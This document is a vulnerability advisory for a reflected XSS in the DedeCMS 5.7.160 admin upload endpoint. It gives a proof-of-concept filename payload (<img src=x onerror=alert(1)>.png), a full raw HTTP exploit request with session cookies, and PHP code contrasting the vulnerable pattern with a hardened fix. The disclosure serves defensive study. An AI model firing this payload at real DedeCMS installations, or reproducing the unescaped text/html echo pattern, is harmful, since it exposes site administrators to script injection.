
DedeCMS V5.7.160 Backend Reflected XSS

Description

Backend image file upload with reflected XSS in the uploaded filename.

Affected Version

DedeCMS <= 5.7.160

POC

  1. Log in to the admin backend management.
  2. In /dede/upload.php, upload a new image file in the form field named "file", with a filename that contains an XSS payload, e.g. <img src=x onerror=alert(1)>.png.
  3. The uploaded filename must end with a normal image extension, e.g. .png or .jpeg, the file content must begin with a valid image file header, and the filename must not contain / or \.
  4. The response from /dede/upload.php contains the XSS payload and is served with the text/html content type.

In the source code, the filename is passed directly through the pathinfo function and assigned to $res['remark'], and the array is finally echoed as JSON, so the XSS payload in the filename appears in the response body. Because the response Content-Type is the default text/html rather than application/json, the browser renders that body as HTML and executes the payload.
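The following is an added example (not DedeCMS's own upload handler, which this page does not reproduce) that puts the unsafe pattern described above next to a hardened variant; the function names, the 'state' key and the allow-list are assumptions, only 'remark' and pathinfo() come from the advisory.

```php
<?php
// Added example, not DedeCMS code: unsafe pattern vs. hardened response.
// Function names, the 'state' key and the allow-list are assumptions.

// Unsafe: the upload's original filename flows through pathinfo() into the
// JSON body, and the body goes out with PHP's default text/html Content-Type.
function upload_response_unsafe(string $originalName): string {
    $info = pathinfo($originalName);
    $res = ['state' => 'SUCCESS', 'remark' => $info['filename']];
    // json_encode() leaves '<' and '>' intact, so a browser that renders this
    // text/html body will execute any markup contained in 'remark'.
    return json_encode($res);
}

// Hardened: keep only allow-listed base names and extensions, escape
// HTML-significant characters inside the JSON, and declare the body as JSON
// (with nosniff) so the browser never renders it as HTML.
function upload_response_safe(string $originalName): string {
    $info = pathinfo($originalName);
    $base = $info['filename'] ?? '';
    $ext  = strtolower($info['extension'] ?? '');
    $okBase = preg_match('/^[A-Za-z0-9_\-]{1,64}$/', $base) === 1;
    $okExt  = in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true);
    if (!$okBase || !$okExt) {
        $body = ['state' => 'ERROR', 'remark' => 'invalid file name'];
    } else {
        $body = ['state' => 'SUCCESS', 'remark' => $base];
    }
    if (!headers_sent()) {
        header('Content-Type: application/json; charset=utf-8');
        header('X-Content-Type-Options: nosniff');
    }
    // JSON_HEX_* turns <, >, &, ' and " into \uXXXX escapes as defence in depth,
    // so even a mis-typed response cannot carry raw markup.
    return json_encode($body, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Constructed sample input: the filename from the advisory's POC.
$constructed = '<img src=x onerror=alert(1)>.png';
echo upload_response_unsafe($constructed), PHP_EOL; // payload echoed verbatim
echo upload_response_safe($constructed), PHP_EOL;   // rejected, markup escaped
```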

Full POC request:

POST /cms/dedecms/dede/upload.php HTTP/1.1
Host: 192.168.0.3
Content-Length: 317
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8dr4oJI5ByNkMbkK
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C4_1%2C5_1%2C6_1%2C2_1%2C3_1; PHPSESSID=n5ibb5j70gj24qh8alr61u6ov2; _csrf_name_1d27e3c9=426b27a62d00e1341c13019bf34f4d05; _csrf_name_1d27e3c91BH21ANI1AGD297L1FF21LN02BGE1DNG=6e24882e1c219de6; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=c7079a345e8c8682; DedeLoginTime=1677347766; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=8163b03f86d69dc6; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fcontent_i_list.php%3Fchannelid%3D2
Connection: close

------WebKitFormBoundary8dr4oJI5ByNkMbkK
Content-Disposition: form-data; name="file"; filename="<img src=x onerror=alert(1)>.png"
Content-Type: image/png

‰PNG

IHDR(-SPLTEà22ßÿêé]‡—³ôœšß&&1œ%dIDAT•c```dbfaec@€‘,¶hQGÜYIEND®B`‚
------WebKitFormBoundary8dr4oJI5ByNkMbkK--

Reference

Reported by Srpopty; vulnerability discovered using Corax.